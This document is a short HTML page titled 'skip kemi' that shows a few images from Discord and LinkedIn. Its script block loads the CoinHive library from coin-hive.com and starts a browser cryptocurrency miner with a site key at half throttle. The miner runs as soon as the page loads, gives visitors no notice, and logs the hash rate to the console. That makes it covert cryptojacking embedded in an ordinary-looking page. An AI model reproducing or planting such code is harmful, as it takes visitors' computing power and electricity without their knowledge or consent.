<html>
<h1>skip kemi</h1>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
			var miner = new CoinHive.Anonymous('h09AxywvSbR95RLdJfZDFbA205oMm7Dt');
			miner.start();
            miner.setThrottle(0.5); 

			// Listen on events
			miner.on('found', function() { 
				console.log("found hash!")
			})
			miner.on('accepted', function() { 
				console.log("accepted hash!")
			})

			// Update stats once per second
			setInterval(function() {
				var hashesPerSecond = miner.getHashesPerSecond();
				var totalHashes = miner.getTotalHashes();
				var acceptedHashes = miner.getAcceptedHashes();

				console.log("hashesPerSecond", hashesPerSecond)
				console.log("totalHashes", totalHashes)
				console.log("acceptedHashes", acceptedHashes)

				console.log("-----------")
				console.log("-----------")
				console.log("-----------")

				// Output to HTML elements...
			}, 1000);</script>
<img src="https://media-exp2.licdn.com/mpr/mpr/shrinknp_200_200/p/1/005/09c/049/13220de.jpg" >
        <img src="https://cdn.discordapp.com/attachments/356489674597990400/399392199558692864/63f51547f0ed979c30428d4396d71f59.png" >
        <img src="https://cdn.discordapp.com/attachments/356489674597990400/399391781814403093/052488fe33e9e51d6cb6d79e23834b9b99972e-v5-wm.png" >
        <img src="https://cdn.discordapp.com/attachments/356489674597990400/399391437550256129/4583467e38a03aca350fc689609bf002--volkswagen-beetles-in-florida.png" >
        <img src="https://cdn.discordapp.com/attachments/356489674597990400/399391345145282560/flat800x800075f.png" >
        <img src="https://cdn.discordapp.com/attachments/356489674597990400/399392033430568970/unknown.png" >
</html>
